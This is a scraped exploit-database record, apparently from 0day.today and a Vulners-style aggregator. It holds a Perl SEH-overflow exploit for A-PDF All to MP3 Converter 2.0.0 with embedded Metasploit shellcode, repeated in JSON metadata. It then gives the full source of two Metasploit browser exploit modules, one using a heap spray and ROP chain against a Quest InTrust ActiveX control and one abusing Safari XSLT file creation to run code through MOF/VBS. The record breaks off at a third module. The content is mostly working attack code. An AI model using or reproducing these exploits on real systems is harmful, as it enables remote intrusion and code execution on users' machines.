ID 1337DAY-ID-15167
Type zdt
Reporter m0nna
Modified 2011-01-30T00:00:00
Description
Exploit for windows platform in category local exploits
# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 SEH overflow
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: <= 2.0.0
# Tested on: Win XP SP2 English
# Date: 29/01/2011
# Author: m0nna
#Email: [email protected]
# triggering details: Open the app, drag the crafted .wav file, calc pops out
# Credits to : h1ch4m (for the stack based overflow exploit)
my $file = "exploit_seh.wav";
my $junk ="\x41" x 4132 ;
my $nseh = "\xeb\x06\x90\x90";
my $seh = pack("V", 0x005d6a91);
# windows/exec - 343 bytes
# http://www.metasploit.com
# Encoder: PexAlphaNum
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".
"\x4e\x36\x43\x46\x42\x50\x5a";
open OUTPUT, ">", "$file";
print OUTPUT $junk.$nseh.$seh.$shellcode;
# 0day.today [2018-04-08] #
{"published": "2011-01-30T00:00:00", "id": "1337DAY-ID-15167", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:48:16", "bulletin": {"published": "2011-01-30T00:00:00", "id": "1337DAY-ID-15167", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.3, "modified": "2016-04-19T23:48:16", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/"}}, "hash": "1ccda0695882b07dc872421cac6249f482d65d5dda2bda72c0917703fcec4d6e", "description": "Exploit for windows platform in category local exploits", "type": "zdt", "lastseen": "2016-04-19T23:48:16", "edition": 1, "title": "A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow (seh)", "href": "http://0day.today/exploit/description/15167", "modified": "2011-01-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/15167", "references": [], "reporter": "m0nna", "sourceData": "# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 SEH overflow\r\n# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm\r\n# Version: <= 2.0.0\r\n# Tested on: Win XP SP2 English\r\n# Date: 29/01/2011\r\n# Author: m0nna\r\n#Email: malware.monna@gmail.com\r\n# triggering details: Open the app, drag the crafted .wav file, calc pops out\r\n# Credits to : h1ch4m (for the stack based overflow exploit)\r\n \r\n \r\nmy $file = \"exploit_seh.wav\";\r\nmy $junk =\"\\x41\" x 4132 ;\r\nmy $nseh = \"\\xeb\\x06\\x90\\x90\";\r\nmy $seh = pack(\"V\", 0x005d6a91);\r\n \r\n# windows/exec - 343 bytes\r\n# http://www.metasploit.com\r\n# Encoder: PexAlphaNum\r\n# EXITFUNC=seh, CMD=calc\r\n \r\nmy $shellcode = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x33\\x4b\\x58\\x4e\\x37\".\r\n\"\\x45\\x50\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\r\n\"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x43\\x4b\\x48\".\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\r\n\"\\x4f\\x35\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x30\\x4b\\x54\".\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x31\\x4b\\x48\".\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43\".\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x57\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x48\\x42\\x37\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x58\\x4a\\x56\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x38\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x43\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\".\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49\".\r\n\"\\x50\\x4f\\x4c\\x58\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x46\".\r\n\"\\x4e\\x36\\x43\\x46\\x42\\x50\\x5a\";\r\n \r\nopen OUTPUT, \">\", \"$file\";\r\n \r\nprint OUTPUT $junk.$nseh.$seh.$shellcode;\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "4a48e12ded3dc8ee46d6955a64097e91", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1a69dabaca705ac779700625bdcbf78b", "key": "sourceHref"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "published"}, {"hash": "6a327d8fd14faa15a3d2dcc7639d6be1", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "92058cfdb472b89dbc6ce2bafc51604b", "key": "reporter"}, {"hash": "3214f286a3dcfb2dfa86929a07c846ca", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category local exploits", "hash": "e408cada7c05dd5878dafb4c6c4601a83cedde9d18362ca31b2a548a6fdb2364", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-08T03:47:24"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-4132"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15167", "SECURITYVULNS:DOC:8525"]}], "modified": "2018-04-08T03:47:24"}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-04-08T03:47:24", "edition": 2, "title": "A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow (seh)", "href": "https://0day.today/exploit/description/15167", "modified": "2011-01-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/15167", "references": [], "reporter": "m0nna", "sourceData": "# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 SEH overflow\r\n# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm\r\n# Version: <= 2.0.0\r\n# Tested on: Win XP SP2 English\r\n# Date: 29/01/2011\r\n# Author: m0nna\r\n#Email: [email\u00a0protected]\r\n# triggering details: Open the app, drag the crafted .wav file, calc pops out\r\n# Credits to : h1ch4m (for the stack based overflow exploit)\r\n \r\n \r\nmy $file = \"exploit_seh.wav\";\r\nmy $junk =\"\\x41\" x 4132 ;\r\nmy $nseh = \"\\xeb\\x06\\x90\\x90\";\r\nmy $seh = pack(\"V\", 0x005d6a91);\r\n \r\n# windows/exec - 343 bytes\r\n# http://www.metasploit.com\r\n# Encoder: PexAlphaNum\r\n# EXITFUNC=seh, CMD=calc\r\n \r\nmy $shellcode = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x33\\x4b\\x58\\x4e\\x37\".\r\n\"\\x45\\x50\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\r\n\"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x43\\x4b\\x48\".\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\r\n\"\\x4f\\x35\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x30\\x4b\\x54\".\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x31\\x4b\\x48\".\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43\".\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x57\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x48\\x42\\x37\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x58\\x4a\\x56\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x38\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x43\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\".\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49\".\r\n\"\\x50\\x4f\\x4c\\x58\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x46\".\r\n\"\\x4e\\x36\\x43\\x46\\x42\\x50\\x5a\";\r\n \r\nopen OUTPUT, \">\", \"$file\";\r\n \r\nprint OUTPUT $junk.$nseh.$seh.$shellcode;\r\n\r\n\n\n# 0day.today [2018-04-08] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "1d715c1431229c773c29a2a26da202b9", "key": "href"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "modified"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "92058cfdb472b89dbc6ce2bafc51604b", "key": "reporter"}, {"hash": "ad80be0cd8f197e031a1878dcfd68894", "key": "sourceData"}, {"hash": "78682a8c57e6cde5420b4d6177917cda", "key": "sourceHref"}, {"hash": "3214f286a3dcfb2dfa86929a07c846ca", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-12-09T05:35:53", "bulletinFamily": "exploit", "description": "This module exploits an uninitialized variable vulnerability in the Annotation Objects ActiveX component. The ActiveX component loads into memory without opting into ALSR so this module exploits the vulnerability against windows Vista and Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX points to part of the ROP chain in a heap chunk and the calculated call will hit the pivot in a separate heap chunk. This will take some time in the users browser.\n", "modified": "2017-10-05T21:44:36", "published": "2012-04-12T06:30:01", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/INTRUST_ANNOTATEX_ADD", "href": "", "type": "metasploit", "title": "Quest InTrust Annotation Objects Uninitialized Pointer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super( update_info(info,\n 'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',\n 'Description' => %q{\n This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. This will take some time in the users browser.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # initial discovery & poc\n 'mr_me <steventhomasseeley[at]gmail.com>' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-5896'],\n [ 'OSVDB', '80662'],\n [ 'BID', '52765'],\n [ 'EDB', '18674']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4]\n # calculation: <targetaddress> - 0x44024a50 / 4 = Ret\n [ 'Automatic', {} ],\n\n # Windows XP/Vista/IE6/IE7 target\n [\n 'Windows XP/Vista SP0-SP3 (IE6/IE7)',\n {\n 'Ret' => 0x76767676,\n }\n ],\n\n # Windows XP/IE8 target - ASLR/DEP Bypass\n [\n 'Windows XP SP0-SP3 DEP bypass (IE8)',\n {\n 'Ret' => 0x31AAAD78,\n }\n ],\n\n # Windows 7/Vista/IE8 target - ASLR/DEP Bypass\n [\n 'Windows 7/Vista ALSR/DEP bypass (IE8)',\n {\n 'Ret' => 0x31AAAD78,\n }\n ]\n ],\n 'DisclosureDate' => 'Mar 28 2012',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])\n ])\n end\n\n def junk\n return rand_text_alpha(4).unpack(\"L\")[0].to_i\n end\n\n def nops(s)\n nops = make_nops(4).unpack(\"N*\") * s\n return nops\n end\n\n def on_request_uri(cli, request)\n #Set target manually or automatically\n my_target = target\n if my_target.name == 'Automatic'\n agent = request.headers['User-Agent']\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\t# xp/ie6\n my_target = targets[1]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\t# xp/ie7\n my_target = targets[1]\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\t# vista/ie7\n my_target = targets[1]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\t# xp/ie8\n my_target = targets[2]\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 8\\.0/\t# vista/ie8\n my_target = targets[2]\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\t# win7/ie8\n my_target = targets[3]\n end\n end\n\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # shellcode\n sc = Rex::Text.to_unescape(p.encoded)\n\n # Randomize object name\n obj_name = rand_text_alpha(rand(100) + 1)\n main_sym = 'main' #main function name\n\n randnop = rand_text_alpha(rand(100) + 1)\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4)\n\n if my_target.name =~ /IE6/ or my_target.name =~ /IE7/\n\n js = <<-EOS\n function heapspray(){\n shellcode = unescape('#{sc}');\n #{randnop} = \"#{js_nops};\n bigblock = unescape(#{randnop});\n headersize = 20;\n slackspace = headersize+shellcode.length;\n while (bigblock.length<slackspace){ bigblock+=bigblock; }\n fillblock = bigblock.substring(0, slackspace);\n block = bigblock.substring(0, bigblock.length-slackspace);\n while(block.length+slackspace<0x40000){ block = block+block+fillblock; }\n memory = new Array();\n for (i=0;i<1000;i++){ memory[i] = block+shellcode; }\n }\n\n function main(){\n heapspray();\n \t\t\t\t#{obj_name}.Add(#{my_target.ret},1);\n }\n EOS\n\n end\n\n if my_target.name =~ /IE8/\n\n # all rop gadgets are taken from AnnotateX.dll - v1.0.32.0 (non alsr/non rebase)\n rop_gadgets = [\n junk,\n junk,\n junk,\n 0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)\n ].pack('V*')\n\n rop_gadgets << [0x44015CEF].pack('V*') * 140\t# padding of retn's\n\n rop_gadgets << [\n 0x44015CEF, # retn\n 0x44015CEF, # retn\n 0x44015CEF, # retn\n 0x44015cee, # pop edx ; retn\n 0x4401a130, # ptr to &VirtualAlloc() (IAT)\n 0x44015ca4, # mov eax,[edx+4] ; retn\n 0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14\n junk, # filler (compensate)\n 0x440159bb, # pop ebp ; retn\n junk, # filler (retn offset compensation)\n junk, # filler (retn offset compensation)\n junk, # filler (retn offset compensation)\n junk, # filler (retn offset compensation)\n 0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)\n 0x440012c1, # push esp ; ret 08\n 0x44016264, # pop ebx ; retn\n 0x00004000, # 0x00000001-> ebx\n 0x44015cc9, # pop edx ; retn\n 0x00001000, # 0x00001000-> edx\n 0x44017664, # pop ecx ; retn\n 0x00000040, # 0x00000040-> ecx\n 0x44017bd8, # pop edi ; retn\n 0x44017ebe, # retn\n 0x4400bf25, # pop eax ; retn\n 0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn\n 0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]\n 0x90909090, # nops, do not change as it changes the offset\n nops(11)\n ].flatten.pack('V*')\n\n rop = Rex::Text.to_unescape(rop_gadgets)\n\n js = <<-EOF\n function heapspray(){\n var payload = unescape('#{rop}');\n payload += unescape('#{sc}');\n var data = payload;\n while(data.length < 100000) { data += data; }\n var onemeg = data.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += data.substr(0, 64*1024/2);\n }\n\n onemeg += data.substr(0, (64*1024/2)-(38/2));\n var block = new Array();\n\n for (i=0; i<700; i++) {\n block[i] = onemeg.substr(0, onemeg.length);\n \t\t\t}\n }\n\n function main(){\n heapspray();\n #{obj_name}.Add(#{my_target.ret},1);\n }\n EOF\n\n #JS obfuscation on demand only for IE8\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n main_sym = js.sym('main')\n end\n\n end\n\n content = <<-EOF\n <object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='#{obj_name}' ></object>\n <script language='JavaScript' defer>\n #{js}\n </script>\n <body onload=\"#{main_sym}();\">\n <body>\n </html>\n EOF\n\n print_status(\"Sending #{self.name}\")\n\n #Remove the extra tabs from content\n content = content.gsub(/^ {4}/, '')\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n=begin\neax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001\neip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\nANNOTA_1+0xae62:\n4400ae62 ff1485504a0244 call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/intrust_annotatex_add.rb"}, {"lastseen": "2019-11-05T17:45:56", "bulletinFamily": "exploit", "description": "This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS.\n", "modified": "2017-09-14T02:03:34", "published": "2011-10-18T07:39:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT", "href": "", "type": "metasploit", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',\n 'Description' => %q{\n This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Nicolas Gregoire'],\n 'References' =>\n [\n ['CVE', '2011-1774'],\n ['OSVDB', '74017'],\n ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],\n ],\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #Windows before Vista\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 20 2011'))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Check target before attacking\n agent = request.headers['User-Agent']\n if agent !~ /Windows NT 5\\.1/ or agent !~ /Safari\\/5/ or agent =~ /Chrome/\n print_error(\"This target isn't supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n url = \"http://\"\n url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n url += \":\" + datastore['SRVPORT'].to_s + get_resource() + \"/\"\n\n content = <<-EOS\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\n<!-- Define the DTD of the document\n This is needed, in order to later reference the XSLT stylesheet by a #fragment\n This trick allows to have both the XML and the XSL in the same file\n Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->\n<!DOCTYPE doc [\n <!ATTLIST xsl:stylesheet\n id ID #REQUIRED\n>]>\n<doc>\n\n<!-- Define location and content of the files -->\n<mof>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location>\n <content><![CDATA[#{@mof_content}]]></content>\n</mof><vbs>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location>\n <content><![CDATA[#{@vbs_content}]]></content>\n</vbs>\n\n<!-- The XSLT stylesheet header, including the \"sx\" extension -->\n<xsl:stylesheet id=\"fragment\" version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n xmlns:sx=\"http://icl.com/saxon\"\n extension-element-prefixes=\"sx\"\n xmlns=\"http://www.w3.org/1999/xhtml\" >\n<xsl:output method=\"xml\" indent=\"yes\" />\n\n<!-- The XSLT template -->\n<xsl:template match=\"/\">\n <!-- Define some XSLT variables -->\n <xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/>\n <xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/>\n <!-- Create the files -->\n <sx:output file=\"{$vbslocation}\" method=\"text\">\n <xsl:value-of select=\"//vbs/content\"/>\n </sx:output>\n <sx:output file=\"{$moflocation}\" method=\"text\">\n <xsl:value-of select=\"//mof/content\"/>\n </sx:output>\n <!-- Some output to the browser -->\n <html> </html>\n</xsl:template>\n</xsl:stylesheet>\n</doc>\n EOS\n\n #Clear the extra tabs\n content = content.gsub(/^ {4}/, '')\n\n print_status(\"Sending #{self.name}\")\n send_response(cli, content, {'Content-Type'=>'application/xml'})\n handler(cli)\n\n end\n\n def exploit\n # In order to save binary data to the file system the payload is written to a VBS\n # file and execute it from there via a MOF\n @mof_name = rand_text_alpha(rand(5)+5) + \".mof\"\n @vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\"\n\n print_status(\"Encoding payload into vbs...\")\n payload = generate_payload_exe\n @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\n\n print_status(\"Generating mof file...\")\n @mof_content = generate_mof(@mof_name, @vbs_name)\n super\n end\nend\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/safari_xslt_output.rb"}, {"lastseen": "2019-11-29T09:38:42", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HP OpenView 